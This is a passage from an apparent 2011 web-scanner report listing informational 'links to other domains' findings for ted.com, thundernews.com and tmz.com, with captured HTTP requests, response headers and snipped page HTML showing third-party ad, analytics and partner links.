var sponsor_popover={_init:function(){this.element.height(this._getData("adSpace_height"));this.payload=this._getData("payload");this.setup_img();this.setup_tracking();if(this.payload.video.length){th
...[SNIP]...
<p class="text"><a href="http://twitter.com/{from_user}" target="_blank">{from_user}</a>
...[SNIP]...
</span>"}else{if(fromID=="image"){mHTML="<a href='http://www.twitter.com/"+item.from_user+"'><img src='"+item.profile_image_url+"' alt='"+item.from_user+"' class='juitterAvatar' />
...[SNIP]...
</a>"}else{mHTML="<a href='http://www.twitter.com/"+item.from_user+"'>@"+item.from_user+":</a>
...[SNIP]...
</a>");var exp=/[\@]+([A-Za-z0-9-_]+)/ig;texto=texto.replace(exp,"<a href='http://twitter.com/$1' class='profileLink'>@$1</a>");var exp=/[\#]+([A-Za-z0-9-_]+)/ig;texto=texto.replace(exp,"<a href='http://juitter.com/#$1' onclick='$.Juitter.start({searchType:\"searchWord\",searchObject:\"$1\"});return false;' class='hashLink'>#$1</a>
...[SNIP]...

17.163. http://www.ted.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ted.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /search?q=xss HTTP/1.1
Host: www.ted.com
Proxy-Connection: keep-alive
Referer: http://www.ted.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: symfony=6set1tc5ierqdp0l3oltlsf2f0; __utma=37353509.509986736.1316239813.1316239813.1316239813.1; __utmb=37353509.1.10.1316239813; __utmc=37353509; __utmz=37353509.1316239813.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _chartbeat2=lgc32p9t3asgv2ad.1316239816249

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 17 Sep 2011 01:51:19 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.8
Content-Length: 7896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="/css/interior.css?1316211139" />
<link rel="stylesheet" type="text/css" media="screen" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/base/ui.all.css" />
<link rel="stylesheet" type="text/css" media="screen" href="/css/jquery/jquery-ui-custom.css?1316211139" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.3/jquery-ui.min.js"></script>
...[SNIP]...
<li><a href="http://www.tedprize.org">TED Prize</a>
...[SNIP]...
<div>
           <img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-703652h&amp;cg=0&amp;cc=1&amp;ts=noscript"
           width="1" height="1" alt="" />

       </div>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=7341760&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" /></noscript>
...[SNIP]...
</div>
       <a rel="entry-content" href="http://ie8php.staging0.smoothfusion.com/TED/View-Slice.php" style="display: none;">LINKS</a>
...[SNIP]...
</div>
       <a rel="entry-content" href="http://www.ieaddons.com/en/details/photosvideos/TEDcom_Ideas_worth_spreading/" style="display: none;">LINKS</a>
...[SNIP]...

17.164. http://www.thundernews.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thundernews.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?GTSE=goog&GTKW=NNTP%20server&gclid=CIyWi8vAoqsCFQhrgwodLzuGZg HTTP/1.1
Host: www.thundernews.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=nntp+server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:31:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 18853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>ThunderNews</tit
...[SNIP]...
</span>: Many features on Thundernews requires Javascript and Cookies. So please Enable Javascript via Browser preferences. Please see: <a href="http://www.google.com/support/bin/answer.py?answer=23852">How to enable JavaScript in your browser.</a>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.165. https://www.thundernews.com/billinginfo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.thundernews.com
Path:   /billinginfo.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /billinginfo.php?currency=USD&pricepointid=207 HTTP/1.1
Host: www.thundernews.com
Connection: keep-alive
Referer: http://www.thundernews.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ivkp48lpbk512tliksia20ffj1; ck_tn_user_country=-; __utma=64644586.2073731114.1316219532.1316219532.1316219532.1; __utmb=64644586; __utmc=64644586; __utmz=64644586.1316219532.1.1.utmgclid=CIyWi8vAoqsCFQhrgwodLzuGZg|utmccn=(not+set)|utmcmd=(not+set)|utmctr=nntp+server

Response

HTTP/1.1 200 OK
Date: Fri, 16 Sep 2011 19:36:54 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=2, max=500
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 62691

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>ThunderNews</tit
...[SNIP]...
<div class="macfee"><a target="_blank" href="https://www.mcafeesecure.com/RatingVerify?ref=www.thundernews.com"><img width="94" height="54" border="0" src="//images.scanalert.com/meter/www.thundernews.com/23.gif" alt="McAfee Secure sites help keep you safe from identity theft, credit card fraud, spyware, spam, viruses and online scams" oncontextmenu="alert('Copying Prohibited by Law - McAfee Secure is a Trademark of McAfee, Inc.'); return false;" /></a>
...[SNIP]...
</SCRIPT>-->
                       <script language="JavaScript" type="text/javascript" src="//smarticon.geotrust.com/si.js"></script>
...[SNIP]...
<!-- Begin Go Analytics -->
<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.166. http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tmz.com
Path:   /2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3 HTTP/1.1
Host: www.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/ron-artest-name-change-official-metta-world-peace-legal-judge-petition-granted-lakers/?adid=hero2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525; phpsessionid=dg1s7ica0oaontqmjt4chg0ta2; s_cc=true; s_wb_ftcv=Sep2011%3AADID%3Ahero2; s_campaign=hero2; s_wb_current=cpvisitor; s_sq=wbrostmz%3D%2526pid%253DRon%252520Artest%252520--%252520Name%252520Change%252520Official%252520...%252520Say%252520Hello%252520to%252520World%252520Peace%252520%25257C%252520TMZ.com%2526pidt%253D1%2526oid%253Dhttp%25253A//www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-ch%2526ot%253DA

Response

HTTP/1.0 200 OK
Date: Sat, 17 Sep 2011 00:58:47 GMT
Server: Apache
X-Powered-By: Crowd Fusion
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 17 Sep 2011 00:58:47 GMT
Set-Cookie: phpsessionid=dg1s7ica0oaontqmjt4chg0ta2fb562eff1d45dc9035b97879; expires=Sun, 20-Feb-2028 00:58:47 GMT; path=/; domain=www.tmz.com
Vary: Accept-Encoding
Content-Length: 115459
Connection: close
Content-Type: text/html; charset="utf-8"
Set-Cookie: SERVERID=; Expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:meebo="http://www.meebo.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=tmz"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pixel.quantserve.com/api/segments.json?a=p-21jBY4_vbHNJQ&callback=qc_results"></script>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img
src="http://wbrostmz.112.2O7.net/b/ss/wbrostmz/1/H.14--NS/0?[AQB]&cdp=3&[AQE]"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tmz.category.wb.dart/celebrity_hookups;boxad=1;pos=atf;tile=1;dcopt=ist;sz=728x90;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/tmz.category.wb.dart/celebrity_hookups;boxad=1;pos=atf;tile=1;dcopt=ist;sz=728x90;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
<noscript>
<a href="http://ad.doubleclick.net/jump/tmz.ros.wb.dart/;pos=btf;boxad=6;tile=6;sz=300x250;ord=123456789?" target="_blank">
<img src="http://ad.doubleclick.net/ad/tmz.ros.wb.dart/;pos=btf;boxad=6;tile=6;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt="">
</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tmz.category.wb.dart/celebrity_hookups;boxad=2;pos=atf;tile=2;sz=300x250;ord='123131'" target="_blank"><img src="http://ad.doubleclick.net/ad/tmz.category.wb.dart/celebrity_hookups;boxad=2;pos=atf;tile=2;sz=300x250;ord='2123131'" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tmz.category.wb.dart/celebrity_hookups;boxad=3;pos=btf;tile=3;sz=300x250;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/tmz.category.wb.dart/celebrity_hookups;boxad=3;pos=btf;tile=3;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<div id="tf-lead-story"><a href="http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/" id="rr-tf-thumb">
       
           <img src="http://ll-media.tmz.com/2011/09/16/0916-rivers-medium-201x183-1.jpg" width="201" height="183" alt="Exclusive: Melissa Rivers Splits With Boyfriend" border="0"/>
...[SNIP]...
<div id="rr-tf-content">
       <a href="http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/" id="rr-tf-postTitle">Exclusive: Melissa Rivers Splits With Boyfriend</a>
...[SNIP]...
</p>
       <a href="http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/" class="read-more-link">READ MORE</a>
...[SNIP]...
<h4><a href="http://www.toofab.com/2011/09/16/taylor-lautner-stubble-lily-collins-abduction-premiere/">Taylor Lautner Shows Stubble at&hellip;</a>
...[SNIP]...
<h4><a href="http://www.toofab.com/2011/09/16/snooki-car-accident-italy-jersey-shore-video/">Snooki Slams Into Italian Cop --&hellip;</a>
...[SNIP]...
<h4><a href="http://www.toofab.com/2011/09/13/hex-iphone-wallet-giveaway/">Win a HEX iPhone Wallet!</a>
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tmz.category.wb.dart/celebrity_hookups;boxad=4;pos=btf;tile=4;sz=300x250;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/tmz.category.wb.dart/celebrity_hookups;boxad=4;pos=btf;tile=4;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://feedproxy.google.com/~r/feedburner/theBERRY/~3/E2QlpVM4se8/" target="_blank">Afternoon eye candy: Hot men of theBERRY! (61 photos)</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://feedproxy.google.com/~r/feedburner/theBERRY/~3/orz5sQ72m6Y/" target="_blank">Take a BERRY Break (40 photos)</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://feedproxy.google.com/~r/feedburner/theBERRY/~3/S9ln5MjkJns/" target="_blank">Nom nom COOKIE nomins (43 photos)</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://www.theberry.com/" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-the-berry-v2.v2011_08_03_124001.png" border="0" />
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebritybabyscoop.com/2011/09/16/julie-bowen-to-avoid-soccer-mom-style-at-the-emmys" target="_blank">Julie Bowen To Avoid Soccer Mom Style At The Emmys</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebritybabyscoop.com/2011/09/16/david-beckham-another-baby-would-be-amazing" target="_blank">David Beckham: Another Baby Would Be &quot;Amazing&quot;</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebritybabyscoop.com/2011/09/16/emily-deschanel-i-really-like-being-pregnant" target="_blank">Emily Deschanel: &quot;I Really Like Being Pregnant&quot;</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://www.celebritybabyscoop.com/" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-celebritybabyscoop.v2011_04_05_095041.gif" border="0" />
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://justjared.buzznet.com/2011/09/16/justin-theroux-is-very-cute-with-jennifer-aniston/" target="_blank">Justin Theroux is &#039;Very Cute&#039; with Jennifer Aniston!</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://justjared.buzznet.com/2011/09/16/joseph-gordon-levitt-premium-rush-trailer/" target="_blank">Joseph Gordon-Levitt: &#039;Premium Rush&#039; Trailer!</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://justjared.buzznet.com/2011/09/16/kate-bosworth-late-night-with-jimmy-fallon-guest/" target="_blank">Kate Bosworth: &#039;Late Night with Jimmy Fallon&#039; Guest!</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://www.justjared.com" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cacheimages/partner-rsss-justjared_logo.v2011_04_05_095041.gif" border="0" />
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.younghollywood.com/news/50-cent-wants-to-achieve-hunger-relief-goal-in-two-and-a-half-years.html" target="_blank">50 Cent wants to achieve hunger relief goal in two-and-a-half years</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.younghollywood.com/news/joss-stone-fostering-a-dog.html" target="_blank">Joss Stone fostering a dog</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.younghollywood.com/news/nick-cannon-doesn-t-want-kids-in-show-business.html" target="_blank">Nick Cannon doesn&#039;t want kids in show business</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://younghollywood.com/" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-young-hwood.v2011_04_05_085613.png" border="0" />
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://bleacherreport.com/articles/851288-20-hot-athletes-we-want-to-see-on-dwts" target="_blank">20 Hot Athletes We Want to See on DWTS</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://bleacherreport.com/articles/850898-hope-solo-pictorial-odds-breakdown-of-her-dwts-title-hopes" target="_blank">Hope Solo: Breaking Down Her DWTS Title Hopes</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://bleacherreport.com/articles/847747-the-top-25-wags-of-the-year-so-far" target="_blank">The Top 25 Wags of the Year (So Far)</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://bleacherreport.com/" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-bleacher-report-logo.v2011_04_05_095041.gif" border="0" />
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebdirtylaundry.com/2011/nancy-grace-and-harvey-go-head-to-head-during-a-tmz-live-special-130-pdt/" target="_blank">Nancy Grace And Harvey Go Head-to-Head During A TMZ LIVE Special 1:30 PDT</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebdirtylaundry.com/2011/kim-kardashian-to-executive-produce-new-pussycat-dolls-reality-show/" target="_blank">Kim Kardashian To Executive Produce New Pussycat Dolls Reality Show</a>
...[SNIP]...
<li><a style="font-weight:bold; font-size:1em;" rel="nofollow" href="http://www.celebdirtylaundry.com/2011/matthew-fox-sued-over-attack-on-bus-driver/" target="_blank">Matthew Fox Sued Over Attack On Bus Driver</a>
...[SNIP]...
</ul>
   <a rel="nofollow" href="http://www.celebdirtylaundry.com/" target="_blank"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-cdl-v2.v2011_04_05_085613.png" border="0" />
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/tmz.category.wb.dart/celebrity_hookups;boxad=5;pos=btf;tile=5;sz=300x250;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/tmz.category.wb.dart/celebrity_hookups;boxad=5;pos=btf;tile=5;sz=300x250;ord=123456789?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
</script>
<script language="JavaScript" src="http://js.adsonar.com/js/adsonar.js"></script>
...[SNIP]...
</a><a href="http://itunes.apple.com/us/podcast/tmz-live/id418086839" target="_blank"><img src="http://ll-media.tmz.com/2011/08/04/0804-tmz-live-podcast.jpg" alt="0804-tmz-live-podcast" />
...[SNIP]...
<map name="Map" id="Map">
   <area shape="rect" coords="0,24,300,89" href="http://itunes.apple.com/us/app/tmz/id299948601?mt=8" target="_blank" alt="Download the TMZ APP for iPhone" />
   <area shape="circle" coords="40,124,17" href="http://www.tmz.com/rss.xml" target="_blank" alt="TMZ RSS feed" />
   <area shape="circle" coords="94,125,17" href="http://www.youtube.com/user/tmz/?adid=youtube" target="_blank" alt="TMZ on Youtube" />
   <area shape="circle" coords="148,123,17" href="http://www.facebook.com/TMZ?ref=ts/?adid=facebook" target="_blank" alt="TMZ on Facebook" />
   <area shape="circle" coords="208,124,17" href="http://common.prndigital.com/affiliatemap/tmz/" target="_blank" alt="Radio Affliate" />
   <area shape="circle" coords="264,124,17" href="http://www.tmz.com/tmz-tv" target="_blank" alt="TMZ on TV" />
   <area shape="rect" coords="146,177,296,190" href="http://twitter.com/#!/harveylevintmz/" target="_blank" alt="Twitter : @harveylevintmz" />
   <area shape="rect" coords="146,193,193,206" href="http://twitter.com/#!/tmz/" target="_blank" alt="Twitter : @TMZ" />
   <area shape="rect" coords="146,209,239,222" href="http://twitter.com/#!/ribeyetmz/" target="_blank" alt="Twitter : @ribeyetmz" />
</map>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/09/16/vanessa-hudgens-in-a-biki_n_966259.html" target="_blank" rel="nofollow">PHOTOS: Vanessa Hudgens In A Bikini</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/09/16/paz-de-la-huertas-unusual_n_966069.html" target="_blank" rel="nofollow">Paz De La Huerta&#039;s Unusual Red Carpet Faces (PHOTOS)</a>
...[SNIP]...
<li><a href="http://www.huffingtonpost.com/2011/09/15/jennifer-aniston-chaz-bon_n_964967.html" target="_blank" rel="nofollow">Jennifer Aniston &amp; Chaz Bono In High School Together (PHOTO)</a>
...[SNIP]...
<center><a href="http://www.huffingtonpost.com" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-huff-po-b-w.v2011_04_06_160748.png" border="0" />
...[SNIP]...
<li><a href="http://thechive.com/2011/09/16/daily-afternoon-randomness-in-hq-41-photos/" target="_blank" rel="nofollow">Daily Afternoon Randomness in HQ (41 Photos)</a>
...[SNIP]...
<li><a href="http://thechive.com/2011/09/16/best-links-on-the-internet-418/" target="_blank" rel="nofollow">Best links on the internet</a>
...[SNIP]...
<li><a href="http://thechive.com/2011/09/16/there-are-sexy-chivers-among-us-90-photos/" target="_blank" rel="nofollow">There are Sexy Chivers Among Us (90 Photos)</a>
...[SNIP]...
<center><a href="http://thechive.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-chive-v2.v2011_04_05_085613.png" border="0" />
...[SNIP]...
<li><a href="http://www.buddytv.com/slideshows/how-i-met-your-mother-episode-photos-first-looks-at-martin-short-and-kal-penn-on-set-38696.aspx" target="_blank" rel="nofollow">&#039;How I Met Your Mother&#039; Episode Photos: First Looks at Martin Short and Kal Penn On Set</a>
...[SNIP]...
<li><a href="http://www.buddytv.com/slideshows/castle-episode-402-heroes-and-villains-59198.aspx" target="_blank" rel="nofollow">&#039;Castle&#039; Episode 4.02: &#039;Heroes and Villains&#039;</a>
...[SNIP]...
<li><a href="http://www.buddytv.com/articles/the-sing-off/video-meet-the-sing-off-groups-41845.aspx" target="_blank" rel="nofollow">VIDEO: Meet 8 of This Season&#039;s &#039;Sing-Off&#039; Groups Before They Take the Stage</a>
...[SNIP]...
<center><a href="http://buddytv.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-buddy-tv-cut.v2011_09_02_151959.png" border="0" />
...[SNIP]...
<li><a href="http://mediatakeout.com/51153/mto-super-world-exclusive-we-know-the-sex-of-jay-z-and-beyonce-s-baby-and-we-have-evidence.html" target="_blank" rel="nofollow">MTO SUPER-WORLD EXCLUSIVE: We Know The SEX Of Jay Z And Beyonce&#039;s BABY!!! (And We Have EVIDENCE)</a>
...[SNIP]...
<li><a href="http://mediatakeout.com/51152/nuh-uhhhhhhhh-we-feel-so-bad-for-this-little-girl-look-what-her-basic-azz-mother-named-her.html" target="_blank" rel="nofollow">NUH UHHHHHHHH!!! We Feel So BAD For This LITTLE GIRL . . . Look What Her BASIC AZZ MOTHER Named Her!!!!</a>
...[SNIP]...
<center><a href="http://www.mediatakeout.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-feed_rss-mediatakeout.v2010_03_28_201818.gif" border="0" />
...[SNIP]...
<li><a href="http://feedproxy.google.com/~r/thesuperficial/SNxk/~3/FCrjNOEnxRU/the-crap-we-missed-friday-9-16-11-09-2011" target="_blank" rel="nofollow">The Crap We Missed ... Friday 9.16.11</a>
...[SNIP]...
<li><a href="http://feedproxy.google.com/~r/thesuperficial/SNxk/~3/NNmtxh4QmRY/scarlett-johansson-kieran-culkin-strip-club-09-2011" target="_blank" rel="nofollow">Kieran Culkin Took Scarlett Johansson To A Strip Club</a>
...[SNIP]...
<li><a href="http://feedproxy.google.com/~r/thesuperficial/SNxk/~3/zYih-_c4mbc/joe-manganiello-alcide-true-blood-single-09-2011" target="_blank" rel="nofollow">Joe Manganiello is Single</a>
...[SNIP]...
<center><a href="http://www.thesuperficial.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-superficial.v2011_04_05_095041.png" border="0" />
...[SNIP]...
<li><a href="http://www.ivillage.com/likes-or-yikes-our-favorite-entertainment-stories-week/1-j-217563" target="_blank" rel="nofollow">Likes or Yikes? Our Favorite Entertainment Stories of the Week</a>
...[SNIP]...
<li><a href="http://www.ivillage.com/elisabeth-moss-so-proud-new-mom-january-jones/1-a-383210" target="_blank" rel="nofollow">Elisabeth Moss &quot;So Proud&quot; of New Mom January Jones</a>
...[SNIP]...
<li><a href="http://www.ivillage.com/x-factor-trailer-likes-or-yikes/1-a-383105" target="_blank" rel="nofollow">&#039;X Factor&#039; Trailer: Likes or Yikes?</a>
...[SNIP]...
<center><a href="http://www.ivillage.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-ivillage.v2011_04_05_085613.png" border="0" />
...[SNIP]...
<li><a href="http://www.celebuzz.com/2011-09-16/jennifer-aniston-justin-theroux-step-out-in-nyc-photos/" target="_blank" rel="nofollow">Jennifer Aniston &amp; Justin Theroux Stroll Hand in Hand in NYC (PHOTOS)</a>
...[SNIP]...
<li><a href="http://www.celebuzz.com/2011-09-16/ryan-gosling-reveals-favorite-justin-bieber-song-mickey-mouse-club-regrets-video/" target="_blank" rel="nofollow">Ryan Gosling Reveals Favorite Justin Bieber Song, &#039;Mickey Mouse Club&#039; Regrets (VIDEO)</a>
...[SNIP]...
<li><a href="http://www.celebuzz.com/2011-09-16/lacey-schwimmers-high-waisted-jeans-yay-or-nay-photos/" target="_blank" rel="nofollow">Lacey Schwimmer&#039;s High Waisted Jeans: Yay or Nay (PHOTOS)</a>
...[SNIP]...
<center><a href="http://www.celebuzz.com/" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-asset-cb-cut.v2011_09_02_151959.png" border="0" />
...[SNIP]...
<li><a href="http://www.tvguide.com/News/Glee-Exclusive-Video-Premiere-1037418.aspx?rss=breakingnews&amp;partnerid=tmz&amp;profileid=breaking" target="_blank" rel="nofollow">Glee Exclusive: Watch the First 36 Seconds of the Season 3 Premiere ... Who Else Is a Junior?</a>
...[SNIP]...
<li><a href="http://www.tvguide.com/News/MTV-Scripted-Reality-Shows-1037419.aspx?rss=breakingnews&amp;partnerid=tmz&amp;profileid=breaking" target="_blank" rel="nofollow">MTV Orders Two New Scripted Series, Four Reality Shows</a>
...[SNIP]...
<li><a href="http://www.tvguide.com/News/Happy-Endings-Fred-Savage-1037417.aspx?rss=breakingnews&amp;partnerid=tmz&amp;profileid=breaking" target="_blank" rel="nofollow">ABC Offers Fred Savage Happy Endings</a>
...[SNIP]...
<center><a href="http://www.tvguide.com" target="_blank" rel="nofollow"><img src="http://ll-assets.tmz.com/www.tmz.com/default/cache/images/partner-rss-tv-guide-cut.v2011_09_02_161258.gif" border="0" />
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/;ord=123456789?" target="_blank"><img src="http://ad.doubleclick.net/ad/;ord=123456789?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
</a> |
<a href="http://www.warnerbros.com/#/page=privacy-policy/" rel="nofollow" target="_blank">Privacy Policy</a> |
<a href="http://www.warnerbros.com/#/page=terms-of-use/" rel="nofollow" target="_blank">Terms of Use</a>
...[SNIP]...
<span style="font-weight:bold; position: absolute; right: 25px;top: 25px;"><a target="_blank" href="http://www.huffingtonpost.com/">HPMG News</a>
...[SNIP]...
</div>

<script src="https://js.revsci.net/gateway/gw.js?csid=A10862"></script>
...[SNIP]...
